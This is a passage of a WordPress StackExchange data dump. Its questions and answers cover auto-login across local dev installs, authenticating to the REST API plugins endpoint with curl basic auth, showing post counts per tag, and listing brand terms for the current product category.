function keep_me_logged_in_for_1_year( $expirein ) {
return 31556926; // 1 year in seconds
}
}
</code></pre>
<p>It always keep me logged in for current project and I haven't problem with redirection to wp-login page but when i switch to another project I still need to reload page to login and for the admin bar to appear.</p>
<p><em>In drop down menu i switch project with changing <code>$project</code> var in core's config</em>
<a href="https://i.stack.imgur.com/OmSSG.gif" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/OmSSG.gif" alt="enter image description here" /></a></p>
<p>How to login immediately and without reloads after changing <code>$project</code>? Is there a problem with that engine got another DB and wp-content folder?</p>
| [
{
"answer_id": 374755,
"author": "birgire",
"author_id": 26350,
"author_profile": "https://wordpress.stackexchange.com/users/26350",
"pm_score": 2,
"selected": false,
"text": "<p>Here's one milder suggestion to try out, assuming different cookie domains, if you're using WordPress 5.5+</p>\n<p>For your <em>development</em> installs, set the <em>getenv</em> environment variable <code>WP_ENVIRONMENT_TYPE</code> or define:</p>\n<pre><code>define( 'WP_ENVIRONMENT_TYPE', 'development' );\n</code></pre>\n<p>within the corresponding <code>wp-config-development.php</code> or the name you use for it.</p>\n<p>Then extend the <a href=\"https://developer.wordpress.org/reference/hooks/auth_cookie_expiration/\" rel=\"nofollow noreferrer\">authentication cookie expiration period</a> for the <em>development</em> installs with e.g.</p>\n<pre><code>add_filter( 'auth_cookie_expiration', function( $ttl, $user_id, $remember ) {\n\n // Adjust to your working environment needs.\n $my_working_types = [ 'development' ];\n $my_working_ttl = YEAR_IN_SECONDS;\n\n return in_array( wp_get_environment_type(), $my_working_types, true ) \n ? $my_working_ttl \n : $ttl;\n\n}, PHP_INT_MAX - 1, 3 );\n</code></pre>\n<p>So you would have to login once to start with, <strong>checking</strong> the "Remember me" on the login screen, else we get the <em>session</em> expiration.</p>\n<p>There are <a href=\"https://core.trac.wordpress.org/browser/trunk/src/wp-includes/load.php?rev=48662#L151\" rel=\"nofollow noreferrer\">four</a> supported environment types of <code>wp_get_environment_type()</code> supported:</p>\n<ul>\n<li><em>local</em></li>\n<li><em>development</em></li>\n<li><em>staging</em></li>\n<li><em>production</em> (default)</li>\n</ul>\n<p>See the <a href=\"https://make.wordpress.org/core/2020/07/24/new-wp_get_environment_type-function-in-wordpress-5-5/\" rel=\"nofollow noreferrer\">dev notes</a> for the back story.</p>\n<p>ps: The setup of using the same domain, with multiple sites in sub-directories, sharing the same WordPress install, reminds me of <a href=\"https://wordpress.org/support/article/create-a-network/\" rel=\"nofollow noreferrer\">WordPress multisite</a>.</p>\n"
},
{
"answer_id": 374846,
"author": "Karich Nikita",
"author_id": 168832,
"author_profile": "https://wordpress.stackexchange.com/users/168832",
"pm_score": 2,
"selected": true,
"text": "<p>I found out my solution, I just need make an additional redirect to make <code>wp_signon()</code> work after I switch project.</p>\n<pre class=\"lang-php prettyprint-override\"><code>if (!is_user_logged_in()) {\n\n $creds = array();\n $creds['user_login'] = 'foo';\n $creds['user_password'] = 'bar';\n $creds['remember'] = false;\n $user = wp_signon( $creds, true ); \n\n add_filter( 'auth_cookie_expiration', 'keep_me_logged_in_for_1_year' );\n function keep_me_logged_in_for_1_year( $expirein ) {\n return 31556926; // 1 year in seconds\n }\n\n //add redirection\n header("Location: "."https://".$_SERVER['HTTP_HOST']);\n exit();\n}\n</code></pre>\n"
}
] | 2020/09/11 | [
"https://wordpress.stackexchange.com/questions/374693",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/168832/"
] | I have a little non-standard WP dev environment, I use one WP core for all my projects and switch each project in core's wp-config.php just changing the `$project` variable (e.g. proj1, proj2, example...). Projects and core are separated and each project has its own DB, wp-content folder, wp-config-dev.php (DB credentials and table prefix), and wp-config.php (usual wp-config that I deploy on the server).
```php
//core's wp-config.php
<?php
$project = 'example';
define( 'WP_CONTENT_DIR', 'C:/dev/projects/'.$project.'/wp/wp-content' );
define( 'WP_CONTENT_URL', 'https://projects.folder/'.$project.'/wp/wp-content' );
include('C:/dev/projects/'.$project.'/wp/wp-config-dev.php');
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
require_once( ABSPATH . 'wp-settings.php' );
// custom functions
include('custom.php');
```
All my projects on the development environment have the same user and password (e.g. foo and bar) and I change them when I export DB when my project is ready to production, so my goal to switch each project just with changing `$project` and not login in every time cuz it is really annoying.
When i switch beetwen projects i have always to log in again into switched project. In included `custom.php` file i have `wp_signon()` function that was worked on WP 4+ but since WP 5.0 it is stopped working. Earlier that approach automatically logged in each project and i even can't log out cuz it keep me logged on page reload :)
```php
$current_user = wp_get_current_user();
if (!user_can( $current_user, 'administrator' )) {
//without if(){} i have same behaviour
$creds = array();
$creds['user_login'] = 'foo';
$creds['user_password'] = 'bar';
$creds['remember'] = false;
wp_signon( $creds, false );
}
```
Now after the switch, I need to update the page again to the admin bar appear and when I go to the console it redirects me to wp-login.php where is user input had filled and the password input are empty.
[](https://i.stack.imgur.com/eohV2.png)
So how to make it always automatically logged in when I change the project and make that each session has no expiration time?
**Note.** I need to make it work only in the custom.php file that I include to core's wp-config, I don't need to make it in each project instance that I deploy on the server.
---
**Update**. Now autologin works fine, the problem was in second parameter of the `wp_signon()` function, it should be true if you use HTTPS on your site.
```php
//custom.php
echo "is_user_logged_in() — ";
var_dump(is_user_logged_in());
//this condition not working after switch project, have to reload page
if (!is_user_logged_in()) {
$creds = array();
$creds['user_login'] = 'foo';
$creds['user_password'] = 'bar';
$creds['remember'] = false;
$user = wp_signon( $creds, true ); //set second parameter to true to enable secure cookies
add_filter( 'auth_cookie_expiration', 'keep_me_logged_in_for_1_year' );
function keep_me_logged_in_for_1_year( $expirein ) {
return 31556926; // 1 year in seconds
}
}
```
It always keep me logged in for current project and I haven't problem with redirection to wp-login page but when i switch to another project I still need to reload page to login and for the admin bar to appear.
*In drop down menu i switch project with changing `$project` var in core's config*
[](https://i.stack.imgur.com/OmSSG.gif)
How to login immediately and without reloads after changing `$project`? Is there a problem with that engine got another DB and wp-content folder? | I found out my solution, I just need make an additional redirect to make `wp_signon()` work after I switch project.
```php
if (!is_user_logged_in()) {
$creds = array();
$creds['user_login'] = 'foo';
$creds['user_password'] = 'bar';
$creds['remember'] = false;
$user = wp_signon( $creds, true );
add_filter( 'auth_cookie_expiration', 'keep_me_logged_in_for_1_year' );
function keep_me_logged_in_for_1_year( $expirein ) {
return 31556926; // 1 year in seconds
}
//add redirection
header("Location: "."https://".$_SERVER['HTTP_HOST']);
exit();
}
``` |
374,695 | <p>Using Basic Authentication as an Administrator, I am getting an error code <code>401 Unauthorized : [rest_cannot_view_plugins] Sorry, you are not allowed to manage plugins for this site.</code> error when I attempt to access the GET <code>/wp-json/wp/v2/plugins</code> endpoint of my server. I can pull Post and Page info with no problem, but when I query against the plugins, I'm getting the 401 error. I've confirmed that the userid used in the API call should be able to manage plugins using the CLI tool:</p>
<pre><code># wp user list-caps $USER | grep plugin
activate_plugins
edit_plugins
update_plugins
delete_plugins
install_plugins
</code></pre>
<p>Any pointers would be appreciated.</p>
| [
{
"answer_id": 374700,
"author": "Adam",
"author_id": 13418,
"author_profile": "https://wordpress.stackexchange.com/users/13418",
"pm_score": 3,
"selected": true,
"text": "<h3>SUGGESTIONS</h3>\n<p>I suggest the following:</p>\n<ul>\n<li>first ensure you are running WordPress version <code>5.5.*</code> as this version adds the endpoints for <code>/wp/v2/plugins</code> see: <a href=\"https://make.wordpress.org/core/2020/07/16/new-and-modified-rest-api-endpoints-in-wordpress-5-5/\" rel=\"nofollow noreferrer\">New and modified REST API endpoints in WordPress 5.5</a></li>\n<li>using basic authentication issue a request as per the following using curl</li>\n</ul>\n<pre><code>curl --user username:password https://example.com/wp-json\n</code></pre>\n<p>The first request should succeed regardless because it will likely be (unless you've done otherwise) unsecured.</p>\n<p>Then try:</p>\n<pre><code>curl --user username:password https://example.com/wp-json/wp/v2/plugins\n</code></pre>\n<p>If this fails you may not have the means to issue basic authentication requests, so add it for the purpose of testing.</p>\n<p>Install the following:</p>\n<p><a href=\"https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php\" rel=\"nofollow noreferrer\">https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php</a></p>\n<p>I'd simply recommend placing that file in your site <code>wp-content/mu-plugins</code> directory. If the directory does not exist, create it first.</p>\n<p>Then repeat the curl request:</p>\n<pre><code>curl --user username:password https://example.com/wp-json/wp/v2/plugins\n</code></pre>\n<p>If you are authenticated correctly, you should receive back a response appropriate for that endpoint.</p>\n<hr />\n<h3>TESTS</h3>\n<ul>\n<li>I have tested this via first trying on an install <code>5.3.*</code> and the route does not exist (as we should expect)</li>\n<li>I have tested this on an install <code>5.5.*</code> and the route does exist as expected but requires an authentication method (for testing I have used Basic Authentication) and you can read more about Authentication methods in general here: <a href=\"https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/</a></li>\n</ul>\n<h3>NOTE (on authentication):</h3>\n<p>Depending on what you are trying to achieve you may benefit from more robust authentication like OAuth or Application Passwords (see <a href=\"https://wordpress.org/plugins/application-passwords/\" rel=\"nofollow noreferrer\">https://wordpress.org/plugins/application-passwords/</a>) but here the choice is ultimately yours, Basic Authentication may suffice, but be mindful of security considerations around storing plain text username and passwords for the given user making the request. You may want to create a specific use with just enough permissions/capabilities for this purpose if relying on Basic Authentication.</p>\n<p>Useful reading:</p>\n<ul>\n<li><a href=\"https://developer.wordpress.org/rest-api/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/rest-api/</a></li>\n<li><a href=\"https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/</a></li>\n<li><a href=\"https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php\" rel=\"nofollow noreferrer\">https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php</a></li>\n</ul>\n"
},
{
"answer_id": 411776,
"author": "Catalin",
"author_id": 159530,
"author_profile": "https://wordpress.stackexchange.com/users/159530",
"pm_score": 0,
"selected": false,
"text": "<p>It might have worked two years ago, but now it does not. The <code>/plugins</code> endpoint returns 401 regardless WP version. Running the latest WP version, logged in.</p>\n"
}
] | 2020/09/11 | [
"https://wordpress.stackexchange.com/questions/374695",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194523/"
] | Using Basic Authentication as an Administrator, I am getting an error code `401 Unauthorized : [rest_cannot_view_plugins] Sorry, you are not allowed to manage plugins for this site.` error when I attempt to access the GET `/wp-json/wp/v2/plugins` endpoint of my server. I can pull Post and Page info with no problem, but when I query against the plugins, I'm getting the 401 error. I've confirmed that the userid used in the API call should be able to manage plugins using the CLI tool:
```
# wp user list-caps $USER | grep plugin
activate_plugins
edit_plugins
update_plugins
delete_plugins
install_plugins
```
Any pointers would be appreciated. | ### SUGGESTIONS
I suggest the following:
* first ensure you are running WordPress version `5.5.*` as this version adds the endpoints for `/wp/v2/plugins` see: [New and modified REST API endpoints in WordPress 5.5](https://make.wordpress.org/core/2020/07/16/new-and-modified-rest-api-endpoints-in-wordpress-5-5/)
* using basic authentication issue a request as per the following using curl
```
curl --user username:password https://example.com/wp-json
```
The first request should succeed regardless because it will likely be (unless you've done otherwise) unsecured.
Then try:
```
curl --user username:password https://example.com/wp-json/wp/v2/plugins
```
If this fails you may not have the means to issue basic authentication requests, so add it for the purpose of testing.
Install the following:
<https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php>
I'd simply recommend placing that file in your site `wp-content/mu-plugins` directory. If the directory does not exist, create it first.
Then repeat the curl request:
```
curl --user username:password https://example.com/wp-json/wp/v2/plugins
```
If you are authenticated correctly, you should receive back a response appropriate for that endpoint.
---
### TESTS
* I have tested this via first trying on an install `5.3.*` and the route does not exist (as we should expect)
* I have tested this on an install `5.5.*` and the route does exist as expected but requires an authentication method (for testing I have used Basic Authentication) and you can read more about Authentication methods in general here: <https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/>
### NOTE (on authentication):
Depending on what you are trying to achieve you may benefit from more robust authentication like OAuth or Application Passwords (see <https://wordpress.org/plugins/application-passwords/>) but here the choice is ultimately yours, Basic Authentication may suffice, but be mindful of security considerations around storing plain text username and passwords for the given user making the request. You may want to create a specific use with just enough permissions/capabilities for this purpose if relying on Basic Authentication.
Useful reading:
* <https://developer.wordpress.org/rest-api/>
* <https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/>
* <https://github.com/WP-API/Basic-Auth/blob/master/basic-auth.php> |
374,790 | <p>I am creating a page template in Wordpress that displays multiple tags that are in a particular category. I have this working, but now I want to have the number of posts within each tag that is displayed as well like if I had a tag called apples with 5 posts it would look like this:</p>
<pre><code>Apples(5)
</code></pre>
<p>As of now it just shows <code>Apples</code></p>
<p>Here is my code I want to modify:</p>
<pre class="lang-php prettyprint-override"><code> <?php
if (is_category()){
$cat = get_query_var('cat');
$yourcat = get_category ($cat);
}
$tag_IDs = array();
query_posts('category_name=health');
if (have_posts()) : while (have_posts()) : the_post();
$posttags = get_the_tags();
if ($posttags):
foreach($posttags as $tag) {
if (!in_array($tag->term_id , $tag_IDs)):
$tag_IDs[] = $tag->term_id;
$tag_names[$tag->term_id] = $tag->name;
endif;
}
endif;
endwhile; endif;
wp_reset_query();
echo "<ul>";
foreach($tag_IDs as $tag_ID){
echo '<a href="'.get_tag_link($tag_ID).'">'.$tag_names[$tag_ID].'</a>';
}
echo "</ul>";
?>
</code></pre>
<p><a href="https://i.stack.imgur.com/f923K.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/f923K.png" alt="enter image description here" /></a>
<a href="https://i.stack.imgur.com/0C6iM.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/0C6iM.png" alt="enter image description here" /></a></p>
| [
{
"answer_id": 374792,
"author": "Luis Chuquilin",
"author_id": 194591,
"author_profile": "https://wordpress.stackexchange.com/users/194591",
"pm_score": 1,
"selected": false,
"text": "<pre><code>function wp_get_postcount($id)\n{\n $contador = 0;\n $taxonomia = 'categoria';\n $args = array(\n 'child_of' => $id,\n );\n $tax_terms = get_terms($taxonomia,$args);\n foreach ($tax_terms as $tax_term){\n $contador +=$tax_term->contador;\n }\n return $contador;\n}\n</code></pre>\n"
},
{
"answer_id": 374793,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 0,
"selected": false,
"text": "<p>The reason you get this is because you're using <code>query_posts</code> and looping over posts, not terms/categories.</p>\n<p>So while you want this:</p>\n<pre><code>terms = child terms of health\nfor each term in terms\n print the term name\n print the number of posts in that term\n</code></pre>\n<p>What the code actually does is this:</p>\n<pre><code>posts = all posts that have the category health\nfor each posts\n print a list of tags this post has\n</code></pre>\n<p><code>query_posts</code>, aside from being a function you should never use, fetches posts, not terms/categories. It does not make sense to fetch posts here.</p>\n<p>So instead we need to do this:</p>\n<pre><code>healthterm = the health term\nterms = child terms of health term\nfor each term in terms\n print the name\n print the post count\n</code></pre>\n<p>So first we get the health term:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$parent = get_term_by( 'slug', 'health', 'category' );\n</code></pre>\n<p>Then get its children with something similar to this:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$terms = get_terms( 'category', [\n 'parent' => $parent->term_id\n] );\n</code></pre>\n<p>And finally, loop over the terms and print their names/counts</p>\n<pre class=\"lang-php prettyprint-override\"><code>if ( !is_wp_error( $terms ) && !empty( $terms ) ) {\n foreach ( $terms as $term ) {\n // ...\n echo $term->name . ' ' .$term->count;\n }\n}\n</code></pre>\n<p>These are the missing building blocks you need to achieve your goal.</p>\n"
},
{
"answer_id": 378323,
"author": "RLM",
"author_id": 60779,
"author_profile": "https://wordpress.stackexchange.com/users/60779",
"pm_score": 1,
"selected": true,
"text": "<p>Here is the code I rewrote that solved my problem. It loops through a category and shows how many articles all the tags inside the category has.</p>\n<pre><code><?php\n $custom_query = new WP_Query( 'posts_per_page=-1&category_name=health' );\n if ( $custom_query->have_posts() ) :\n $all_tags = array();\n while ( $custom_query->have_posts() ) : $custom_query->the_post();\n $posttags = get_the_tags();\n if ( $posttags ) {\n foreach($posttags as $tag) {\n $all_tags[$tag->term_id]['id'] = $tag->term_id;\n $all_tags[$tag->term_id]['name'] = $tag->name;\n $all_tags[$tag->term_id]['count']++;\n }\n }\n endwhile;\n endif;\n \n $tags_arr = array_unique( $all_tags );\n $tags_str = implode( ",", $tags_arr );\n \n $args = array(\n 'smallest' => 12,\n 'largest' => 12,\n 'unit' => 'px',\n 'number' => 0,\n 'format' => 'list',\n 'include' => $tags_str\n );\n foreach ( $all_tags as $tag_ID => $tag ) {\n echo '<a href="'.get_tag_link($tag_ID).'">' . $tag['name'] . '</a> ('; echo $tag['count'] . ')<br>';\n }\n wp_reset_query()\n ?>\n</code></pre>\n"
}
] | 2020/09/13 | [
"https://wordpress.stackexchange.com/questions/374790",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/60779/"
] | I am creating a page template in Wordpress that displays multiple tags that are in a particular category. I have this working, but now I want to have the number of posts within each tag that is displayed as well like if I had a tag called apples with 5 posts it would look like this:
```
Apples(5)
```
As of now it just shows `Apples`
Here is my code I want to modify:
```php
<?php
if (is_category()){
$cat = get_query_var('cat');
$yourcat = get_category ($cat);
}
$tag_IDs = array();
query_posts('category_name=health');
if (have_posts()) : while (have_posts()) : the_post();
$posttags = get_the_tags();
if ($posttags):
foreach($posttags as $tag) {
if (!in_array($tag->term_id , $tag_IDs)):
$tag_IDs[] = $tag->term_id;
$tag_names[$tag->term_id] = $tag->name;
endif;
}
endif;
endwhile; endif;
wp_reset_query();
echo "<ul>";
foreach($tag_IDs as $tag_ID){
echo '<a href="'.get_tag_link($tag_ID).'">'.$tag_names[$tag_ID].'</a>';
}
echo "</ul>";
?>
```
[](https://i.stack.imgur.com/f923K.png)
[](https://i.stack.imgur.com/0C6iM.png) | Here is the code I rewrote that solved my problem. It loops through a category and shows how many articles all the tags inside the category has.
```
<?php
$custom_query = new WP_Query( 'posts_per_page=-1&category_name=health' );
if ( $custom_query->have_posts() ) :
$all_tags = array();
while ( $custom_query->have_posts() ) : $custom_query->the_post();
$posttags = get_the_tags();
if ( $posttags ) {
foreach($posttags as $tag) {
$all_tags[$tag->term_id]['id'] = $tag->term_id;
$all_tags[$tag->term_id]['name'] = $tag->name;
$all_tags[$tag->term_id]['count']++;
}
}
endwhile;
endif;
$tags_arr = array_unique( $all_tags );
$tags_str = implode( ",", $tags_arr );
$args = array(
'smallest' => 12,
'largest' => 12,
'unit' => 'px',
'number' => 0,
'format' => 'list',
'include' => $tags_str
);
foreach ( $all_tags as $tag_ID => $tag ) {
echo '<a href="'.get_tag_link($tag_ID).'">' . $tag['name'] . '</a> ('; echo $tag['count'] . ')<br>';
}
wp_reset_query()
?>
``` |
374,953 | <p>I need to list all custom terms (brands) that are associated with products from the category that is currently being viewed. E.g. I have these brands created:</p>
<ul>
<li>Shirt Brand A</li>
<li>Shirt Brand B</li>
<li>Shirt Brand C</li>
<li>Jeans Brand A</li>
<li>Jeans Brand B</li>
</ul>
<p>On 'Shirts' category page, only Shirts Brands <code>A</code>, <code>B</code> and <code>C</code> are displayed.</p>
<p>This is how I did it:</p>
<pre><code>$args = array(
'taxonomy' => 'brand',
'orderby' => 'count',
'order' => 'DESC',
'hide_empty' => false
);
$brands = get_terms($args);
foreach($brands as $brand) {
if(is_product_category()) {
$cat_id = get_queried_object_id();
$count_args = array(
'post_type' => 'product',
'post_status' => 'publish',
'tax_query' => array(
array(
'taxonomy' => 'product_cat',
'field' => 'term_id',
'terms' => $cat_id,
'operator' => 'IN'
),
array(
'taxonomy' => 'brand',
'field' => 'slug',
'terms' => $brand->slug,
'operator' => 'IN'
)
)
);
$count_products = new WP_Query($count_args);
if($count_products->post_count <= 0) continue; // Skip if this query contains zero products
// Display brand that has at least 1 product in this category
display_brand();
}
}
</code></pre>
<p>Of course it works, however with 300+ brands created it sometimes takes 0,5 - 1,5 seconds for this loop to get processed, which is unnecessary lot. AFAIK there is no direct database relation between terms and product categories (only number of posts for each term), but is there a better way to do this with better performance?</p>
| [
{
"answer_id": 374960,
"author": "DevelJoe",
"author_id": 188571,
"author_profile": "https://wordpress.stackexchange.com/users/188571",
"pm_score": 1,
"selected": false,
"text": "<p>Define your terms as <strong>hierarchical</strong> custom taxonomies, as child taxonomies from the corresponding parent taxonomy you want them to inherit from...? Like this you would only need to query for your parent tax, and simply echo out the respective child taxonomies, if required.</p>\n<p>** UPDATE **</p>\n<p>What you do is query all the terms of a given taxonomy, and use them to query posts having them, so you're creating a WP_Query object for every single brand tax, which is unnecessarily expensive. You should do it the other way around; simply query posts which have terms of the brand taxonomy associated to it (and whichever additional feature you may want to use for the query) ONCE only, and while retrieving these posts (inside your wp_query loop), access the id of the currently queried post in the loop, and retrieve the <code>brand</code> terms associated to it. Sth like this:</p>\n<pre><code>$product_query_args = array(\n 'post_type' => 'your_post_type',\n 'tax_query' => array(\n array(\n 'taxonomy' => 'brand'\n )\n )\n);\n\n$products_request = new WP_Query( $product_query_args );\n\nif ( $products_request->have_posts() ) {\n \n while ( $products_request->have_posts() ) {\n\n $products_request->the_post();\n\n // Get ID of currently iterated post\n $id_of_iterated_product = get_the_ID();\n\n // Retrieve associated brand terms\n $brands = get_the_terms( $id_of_iterated_product, 'brand' );\n\n // Check if there are brand terms associated to iterated post\n if ( ! empty( $brands ) ) {\n\n // If so, iterate through them and get the name of each\n foreach( $brands as $brand_key => $brand_object ) {\n\n $brand_name = $brand_object->name;\n\n // Do whatever you want with it\n\n }\n\n }\n\n }\n\n}\n</code></pre>\n<p>Like this, you actually only make one full query instead of countless, so performance should be better, hopefully. Let me know how this solution suits you.</p>\n<p>To explain it a little further to you why I thought of hierarchical taxonomies; you wrote:</p>\n<p>"I need to list all custom terms (brands) that are associated with products from the category that is currently being viewed."</p>\n<ul>\n<li>From this I understand that there's something like a category filter on your website, and you wanna display all the posts of that category, and then echo out the brands for each of these posts. For this, what you could actually do is simply query posts in function of the selected category (makes your query a lot easier), and then for each post retrieve and spit out the associated brands (which are all child tax's of the queried category, if you defined them to be so). You can however reach the same in querying your products in function of the given category, and then retrieve all the brand tags associated to each retrieved post as I did in my code; maybe that's even better when it comes to performance. But from a logical point of view, using taxonomy hierarchics and one single category query appears to be the easiest and most logical way of doing this.</li>\n</ul>\n"
},
{
"answer_id": 375081,
"author": "Antti Koskinen",
"author_id": 144392,
"author_profile": "https://wordpress.stackexchange.com/users/144392",
"pm_score": 3,
"selected": true,
"text": "<p>To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global <code>$wp_query</code> instead of doing an extra <code>WP_Query</code>.</p>\n<pre><code>// make the current query available from global variable\nglobal $wp_query;\n// helper variable\n$brands = array();\n// loop queried posts\nforeach ( $wp_query->posts as $queried_post ) {\n // check if they have terms from custom taxonomy\n $current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID\n if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {\n // push found brands to helper variable\n foreach ( $current_post_brands as $current_post_brand ) {\n // avoid having same brands multiple time in the helper variable\n if ( ! isset( $brands[$current_post_brand->term_id] ) ) {\n $brands[$current_post_brand->term_id] = $current_post_brand;\n }\n }\n }\n}\n\n// do something with the brand terms (WP_Term)\nforeach ( $brands as $brand_id => $brand_term ) {\n // yay?\n}\n</code></pre>\n<p>This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, <a href=\"https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache\">Explanation of update_post_(meta/term)_cache</a></p>\n<hr />\n<p><strong>EDIT 23.9.2020</strong></p>\n<p>(<em>Facepalm</em>) Let me try this again...</p>\n<p>One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.</p>\n<pre><code>function helper_get_brands_in_category( int $cat_id ) {\n $transient = get_transient( 'brands_in_category_' . $cat_id );\n if ( $transient ) {\n return $transient;\n }\n \n $args = array(\n 'post_type' => 'product',\n 'posts_per_page' => 1000, // is this enough?\n 'post_status' => 'publish',\n 'no_found_rows' => true,\n 'update_post_meta_cache' => false, // not needed in this case\n 'fields' => 'ids', // not all post data needed here\n 'tax_query' => array(\n array(\n 'taxonomy' => 'product_cat',\n 'field' => 'term_id',\n 'terms' => $cat_id,\n )\n ),\n );\n $query = new WP_Query( $args );\n $brands = array();\n \n foreach ($query->posts as $post_id) {\n $post_brands = get_the_terms( $post_id, 'brands' );\n if ( ! is_wp_error( $post_brands ) && $post_brands ) {\n foreach ( $post_brands as $post_brand ) {\n if ( ! isset( $brands[$post_brand->term_id] ) ) {\n $brands[$post_brand->term_id] = $post_brand;\n }\n }\n }\n }\n\n set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed\n\n return $brands;\n}\n// Usage\n$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );\n</code></pre>\n<p>If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,</p>\n<pre><code>function clear_brands_in_category_transients( $term_id, $tt_id ) {\n $product_cats = get_terms( array(\n 'taxonomy' => 'product_cat',\n 'hide_empty' => false,\n 'fields' => 'ids',\n ) );\n if ( ! is_wp_error( $product_cats ) && $product_cats ) {\n foreach ($product_cats as $cat_id) {\n delete_transient( 'brands_in_category_' . $cat_id );\n }\n }\n}\nadd_action( 'create_brands', 'clear_brands_in_category_transients', 10, 2 );\n</code></pre>\n<p>I used the <a href=\"https://developer.wordpress.org/reference/hooks/create_taxonomy/\" rel=\"nofollow noreferrer\">create_{$taxonomy}</a> hook above.</p>\n"
}
] | 2020/09/16 | [
"https://wordpress.stackexchange.com/questions/374953",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/138610/"
] | I need to list all custom terms (brands) that are associated with products from the category that is currently being viewed. E.g. I have these brands created:
* Shirt Brand A
* Shirt Brand B
* Shirt Brand C
* Jeans Brand A
* Jeans Brand B
On 'Shirts' category page, only Shirts Brands `A`, `B` and `C` are displayed.
This is how I did it:
```
$args = array(
'taxonomy' => 'brand',
'orderby' => 'count',
'order' => 'DESC',
'hide_empty' => false
);
$brands = get_terms($args);
foreach($brands as $brand) {
if(is_product_category()) {
$cat_id = get_queried_object_id();
$count_args = array(
'post_type' => 'product',
'post_status' => 'publish',
'tax_query' => array(
array(
'taxonomy' => 'product_cat',
'field' => 'term_id',
'terms' => $cat_id,
'operator' => 'IN'
),
array(
'taxonomy' => 'brand',
'field' => 'slug',
'terms' => $brand->slug,
'operator' => 'IN'
)
)
);
$count_products = new WP_Query($count_args);
if($count_products->post_count <= 0) continue; // Skip if this query contains zero products
// Display brand that has at least 1 product in this category
display_brand();
}
}
```
Of course it works, however with 300+ brands created it sometimes takes 0,5 - 1,5 seconds for this loop to get processed, which is unnecessary lot. AFAIK there is no direct database relation between terms and product categories (only number of posts for each term), but is there a better way to do this with better performance? | To fine-tune DevelJoe's answer a bit more, you could access the queried posts from the global `$wp_query` instead of doing an extra `WP_Query`.
```
// make the current query available from global variable
global $wp_query;
// helper variable
$brands = array();
// loop queried posts
foreach ( $wp_query->posts as $queried_post ) {
// check if they have terms from custom taxonomy
$current_post_brands = get_the_terms( $queried_post, 'brands' ); // post object accepted here also, not just ID
if ( ! is_wp_error( $current_post_brands ) && $current_post_brands ) {
// push found brands to helper variable
foreach ( $current_post_brands as $current_post_brand ) {
// avoid having same brands multiple time in the helper variable
if ( ! isset( $brands[$current_post_brand->term_id] ) ) {
$brands[$current_post_brand->term_id] = $current_post_brand;
}
}
}
}
// do something with the brand terms (WP_Term)
foreach ( $brands as $brand_id => $brand_term ) {
// yay?
}
```
This is probably a faster way, because WP automatically caches the terms of the queried posts - to my undestanding. This caching is dicussed for example here, [Explanation of update\_post\_(meta/term)\_cache](https://wordpress.stackexchange.com/questions/215871/explanation-of-update-post-meta-term-cache)
---
**EDIT 23.9.2020**
(*Facepalm*) Let me try this again...
One way could be to first query all the posts in the current category. Then loop found posts to check their brand terms. Finally spit out an array of unique brand terms. Optionally you could also save the result into a transient so that the querying and looping doesn't run on every page load, thus saving some server resources.
```
function helper_get_brands_in_category( int $cat_id ) {
$transient = get_transient( 'brands_in_category_' . $cat_id );
if ( $transient ) {
return $transient;
}
$args = array(
'post_type' => 'product',
'posts_per_page' => 1000, // is this enough?
'post_status' => 'publish',
'no_found_rows' => true,
'update_post_meta_cache' => false, // not needed in this case
'fields' => 'ids', // not all post data needed here
'tax_query' => array(
array(
'taxonomy' => 'product_cat',
'field' => 'term_id',
'terms' => $cat_id,
)
),
);
$query = new WP_Query( $args );
$brands = array();
foreach ($query->posts as $post_id) {
$post_brands = get_the_terms( $post_id, 'brands' );
if ( ! is_wp_error( $post_brands ) && $post_brands ) {
foreach ( $post_brands as $post_brand ) {
if ( ! isset( $brands[$post_brand->term_id] ) ) {
$brands[$post_brand->term_id] = $post_brand;
}
}
}
}
set_transient( 'brands_in_category_' . $cat_id, $brands, WEEK_IN_SECONDS ); // change expiration date as needed
return $brands;
}
// Usage
$brands_in_category = helper_get_brands_in_category( get_queried_object_id() );
```
If you save the brands into transients, then you may also want to invalidate the transients whenever new brands are added. Something along these lines,
```
function clear_brands_in_category_transients( $term_id, $tt_id ) {
$product_cats = get_terms( array(
'taxonomy' => 'product_cat',
'hide_empty' => false,
'fields' => 'ids',
) );
if ( ! is_wp_error( $product_cats ) && $product_cats ) {
foreach ($product_cats as $cat_id) {
